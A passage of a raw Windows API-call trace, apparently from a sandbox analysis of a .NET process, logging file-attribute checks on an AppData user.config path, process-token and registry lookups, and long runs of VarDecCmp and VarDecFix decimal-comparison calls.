(in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\microsoft_corporation\\defaultdomain_path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x1b83b7e8 | out: lpFileInformation=0x1b83b7e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0265.507] CloseHandle (hObject=0x7ec) returned 1 [0265.507] GetCurrentProcess () returned 0xffffffffffffffff [0265.507] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b83b908 | out: TokenHandle=0x1b83b908*=0x7ec) returned 1 [0265.508] CloseHandle (hObject=0x7ec) returned 1 [0265.509] GetCurrentProcess () returned 0xffffffffffffffff [0265.509] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b83b748 | out: TokenHandle=0x1b83b748*=0x7ec) returned 1 [0265.510] GetFileAttributesExW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft_corporation\\defaultdomain_path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x1b83b7f0 | out: lpFileInformation=0x1b83b7f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0265.510] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x84 [0265.510] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config", nBufferLength=0x84, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config", lpFilePart=0x0) returned 0x83 [0265.511] GetFileAttributesExW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft_corporation\\defaultdomain_path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x1b83b7e8 | out: lpFileInformation=0x1b83b7e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0265.511] CloseHandle (hObject=0x7ec) returned 1 [0265.835] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b839b58 | out: phkResult=0x1b839b58*=0x0) returned 0x2 [0265.835] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b839b58 | out: phkResult=0x1b839b58*=0x0) returned 0x2 [0266.353] VarDecCmp (pdecLeft=0x1b83ad08, pdecRight=0x1b83acf8) returned 0x1 [0266.355] VarDecFix (in: pdecIn=0x1b83ace8, pdecResult=0x1b83ac70 | out: pdecResult=0x1b83ac70) returned 0x0 [0266.355] VarDecCmp (pdecLeft=0x1b83acd8, pdecRight=0x1b83acc8) returned 0x1 [0266.355] VarDecCmp (pdecLeft=0x1b83ad00, pdecRight=0x1b83acf0) returned 0x2 [0266.355] VarDecFix (in: pdecIn=0x1b83ace0, pdecResult=0x1b83ac50 | out: pdecResult=0x1b83ac50) returned 0x0 [0266.355] VarDecCmp (pdecLeft=0x1b83acd0, pdecRight=0x1b83acc0) returned 0x1 [0266.355] VarDecCmp (pdecLeft=0x1b83acb0, pdecRight=0x1b83aca0) returned 0x2 [0266.362] VarDecCmp (pdecLeft=0x1b83ad08, pdecRight=0x1b83acf8) returned 0x1 [0266.362] VarDecFix (in: pdecIn=0x1b83ace8, pdecResult=0x1b83ac70 | out: pdecResult=0x1b83ac70) returned 0x0 [0266.362] VarDecCmp (pdecLeft=0x1b83acd8, pdecRight=0x1b83acc8) returned 0x1 [0266.362] VarDecCmp (pdecLeft=0x1b83ad00, pdecRight=0x1b83acf0) returned 0x2 [0266.362] VarDecFix (in: pdecIn=0x1b83ace0, pdecResult=0x1b83ac50 | out: pdecResult=0x1b83ac50) returned 0x0 [0266.362] VarDecCmp (pdecLeft=0x1b83acd0, pdecRight=0x1b83acc0) returned 0x1 [0266.362] VarDecCmp (pdecLeft=0x1b83acb0, pdecRight=0x1b83aca0) returned 0x2 [0266.367] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.380] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.381] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.381] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.381] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.383] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.386] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.392] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.392] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.395] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.396] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.397] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.397] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.398] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.398] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.398] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.398] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.399] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.400] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.400] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.400] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.406] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.408] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.408] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.408] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.408] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.409] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.409] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.409] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.409] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.410] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.410] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.412] VarDecCmp (pdecLeft=0x1b83bcb0, pdecRight=0x1b83bca0) returned 0x1 [0266.498] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x1 [0266.523] VarDecCmp (pdecLeft=0x1b83b920, pdecRight=0x1b83b910) returned 0x1 [0266.523] VarDecCmp (pdecLeft=0x1b83b920, pdecRight=0x1b83b910) returned 0x0 [0266.527] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.527] VarDecCmp (pdecLeft=0x1b83b760, pdecRight=0x1b83b750) returned 0x1 [0266.529] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x0 [0266.529] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.529] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.529] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x1 [0266.529] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x1 [0266.529] VarDecCmp (pdecLeft=0x1b83b760, pdecRight=0x1b83b750) returned 0x1 [0266.529] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x1 [0266.529] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x0 [0266.529] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x0 [0266.529] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.529] VarDecCmp (pdecLeft=0x1b83b760, pdecRight=0x1b83b750) returned 0x0 [0266.529] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x1 [0266.529] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.529] VarDecCmp (pdecLeft=0x1b83b760, pdecRight=0x1b83b750) returned 0x1 [0266.529] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x0 [0266.529] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.530] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.530] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x1 [0266.530] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x1 [0266.530] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.530] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.530] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x1 [0266.530] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.530] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.530] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x1 [0266.530] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.530] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.530] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.530] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.530] VarDecCmp (pdecLeft=0x1b83b760, pdecRight=0x1b83b750) returned 0x1 [0266.531] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x0 [0266.531] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.531] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.531] VarDecCmp (pdecLeft=0x1b83b760, pdecRight=0x1b83b750) returned 0x1 [0266.531] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x0 [0266.531] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.531] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.531] VarDecCmp (pdecLeft=0x1b83b760, pdecRight=0x1b83b750) returned 0x1 [0266.531] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x1 [0266.531] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x0 [0266.531] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.531] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.531] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.531] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.531] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.531] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.531] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.532] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b760, pdecRight=0x1b83b750) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x0 [0266.532] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.532] VarDecCmp (pdecLeft=0x1b83b760, pdecRight=0x1b83b750) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x0 [0266.532] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.532] VarDecCmp (pdecLeft=0x1b83b760, pdecRight=0x1b83b750) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x0 [0266.532] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.532] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.532] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b760, pdecRight=0x1b83b750) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b8c0, pdecRight=0x1b83b8b0) returned 0x0 [0266.532] VarDecCmp (pdecLeft=0x1b83b800, pdecRight=0x1b83b7f0) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b800, pdecRight=0x1b83b7f0) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b800, pdecRight=0x1b83b7f0) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b800, pdecRight=0x1b83b7f0) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.532] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.533] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.533] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.533] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.533] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.533] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.533] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.533] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.533] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.533] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.533] VarDecCmp (pdecLeft=0x1b83b760, pdecRight=0x1b83b750) returned 0x1 [0266.533] VarDecCmp (pdecLeft=0x1b83b6a0, pdecRight=0x1b83b690) returned 0x0 [0266.533] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.533] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.533] VarDecCmp (pdecLeft=0x1b83baa0, pdecRight=0x1b83ba90) returned 0x1 [0266.533] VarDecCmp (pdecLeft=0x1b83b9e0, pdecRight=0x1b83b9d0) returned 0x0 [0266.544] VarDecCmp (pdecLeft=0x1b83c978, pdecRight=0x1b83c968) returned 0x2 [0266.544] VarDecCmp (pdecLeft=0x1b83c858, pdecRight=0x1b83c848) returned 0x2 [0266.544] VarDecFix (in: pdecIn=0x1b83c838, pdecResult=0x1b83c7c0 | out: pdecResult=0x1b83c7c0) returned 0x0 [0266.544] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x1 [0266.544] VarDecCmp (pdecLeft=0x1b83c850, pdecRight=0x1b83c840) returned 0x2 [0266.544] VarDecFix (in: pdecIn=0x1b83c830, pdecResult=0x1b83c7a0 | out: pdecResult=0x1b83c7a0) returned 0x0 [0266.545] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x1 [0266.545] VarDecCmp (pdecLeft=0x1b83c800, pdecRight=0x1b83c7f0) returned 0x2 [0266.545] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.545] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x1 [0266.545] VarDecCmp (pdecLeft=0x1b83c928, pdecRight=0x1b83c918) returned 0x2 [0266.545] VarDecCmp (pdecLeft=0x1b83c9f8, pdecRight=0x1b83c9e8) returned 0x2 [0266.546] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.546] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x2 [0266.546] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x2 [0266.546] VarDecCmp (pdecLeft=0x1b83c598, pdecRight=0x1b83c588) returned 0x2 [0266.546] VarDecCmp (pdecLeft=0x1b83c558, pdecRight=0x1b83c548) returned 0x1 [0266.546] VarDecCmp (pdecLeft=0x1b83c538, pdecRight=0x1b83c528) returned 0x1 [0266.546] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.546] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.551] VarDecCmp (pdecLeft=0x1b83c518, pdecRight=0x1b83c508) returned 0x0 [0266.551] VarDecCmp (pdecLeft=0x1b83c4f8, pdecRight=0x1b83c4e8) returned 0x2 [0266.551] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.551] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x0 [0266.552] VarDecCmp (pdecLeft=0x1b83c518, pdecRight=0x1b83c508) returned 0x0 [0266.552] VarDecCmp (pdecLeft=0x1b83c4f8, pdecRight=0x1b83c4e8) returned 0x2 [0266.552] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.552] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x0 [0266.561] VarDecCmp (pdecLeft=0x1b83c518, pdecRight=0x1b83c508) returned 0x0 [0266.561] VarDecCmp (pdecLeft=0x1b83c4f8, pdecRight=0x1b83c4e8) returned 0x2 [0266.561] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.561] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x0 [0266.561] VarDecCmp (pdecLeft=0x1b83c978, pdecRight=0x1b83c968) returned 0x2 [0266.561] VarDecCmp (pdecLeft=0x1b83c858, pdecRight=0x1b83c848) returned 0x2 [0266.561] VarDecFix (in: pdecIn=0x1b83c838, pdecResult=0x1b83c7c0 | out: pdecResult=0x1b83c7c0) returned 0x0 [0266.561] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x1 [0266.561] VarDecCmp (pdecLeft=0x1b83c850, pdecRight=0x1b83c840) returned 0x2 [0266.561] VarDecFix (in: pdecIn=0x1b83c830, pdecResult=0x1b83c7a0 | out: pdecResult=0x1b83c7a0) returned 0x0 [0266.561] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x1 [0266.561] VarDecCmp (pdecLeft=0x1b83c800, pdecRight=0x1b83c7f0) returned 0x2 [0266.561] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.561] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x1 [0266.561] VarDecCmp (pdecLeft=0x1b83c928, pdecRight=0x1b83c918) returned 0x1 [0266.561] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.561] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x1 [0266.561] VarDecCmp (pdecLeft=0x1b83c928, pdecRight=0x1b83c918) returned 0x1 [0266.561] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.561] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x0 [0266.561] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.562] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x0 [0266.562] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.562] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x0 [0266.562] VarDecCmp (pdecLeft=0x1b83c9f8, pdecRight=0x1b83c9e8) returned 0x2 [0266.562] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.562] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x1 [0266.564] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.564] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x1 [0266.564] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.564] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.564] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.564] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.564] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.564] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.564] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.564] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.564] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.564] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.564] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.566] VarDecCmp (pdecLeft=0x1b83c978, pdecRight=0x1b83c968) returned 0x2 [0266.566] VarDecCmp (pdecLeft=0x1b83c858, pdecRight=0x1b83c848) returned 0x2 [0266.566] VarDecFix (in: pdecIn=0x1b83c838, pdecResult=0x1b83c7c0 | out: pdecResult=0x1b83c7c0) returned 0x0 [0266.566] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x1 [0266.566] VarDecCmp (pdecLeft=0x1b83c850, pdecRight=0x1b83c840) returned 0x2 [0266.566] VarDecFix (in: pdecIn=0x1b83c830, pdecResult=0x1b83c7a0 | out: pdecResult=0x1b83c7a0) returned 0x0 [0266.566] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x1 [0266.566] VarDecCmp (pdecLeft=0x1b83c800, pdecRight=0x1b83c7f0) returned 0x2 [0266.566] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.566] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x1 [0266.566] VarDecCmp (pdecLeft=0x1b83c928, pdecRight=0x1b83c918) returned 0x1 [0266.567] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.567] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x1 [0266.567] VarDecCmp (pdecLeft=0x1b83c928, pdecRight=0x1b83c918) returned 0x1 [0266.567] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.567] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x0 [0266.567] VarDecCmp (pdecLeft=0x1b83c9f8, pdecRight=0x1b83c9e8) returned 0x2 [0266.567] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.567] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x1 [0266.567] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.567] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x1 [0266.567] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.567] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.567] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.567] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.567] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.567] VarDecCmp (pdecLeft=0x1b83c978, pdecRight=0x1b83c968) returned 0x2 [0266.567] VarDecCmp (pdecLeft=0x1b83c858, pdecRight=0x1b83c848) returned 0x2 [0266.567] 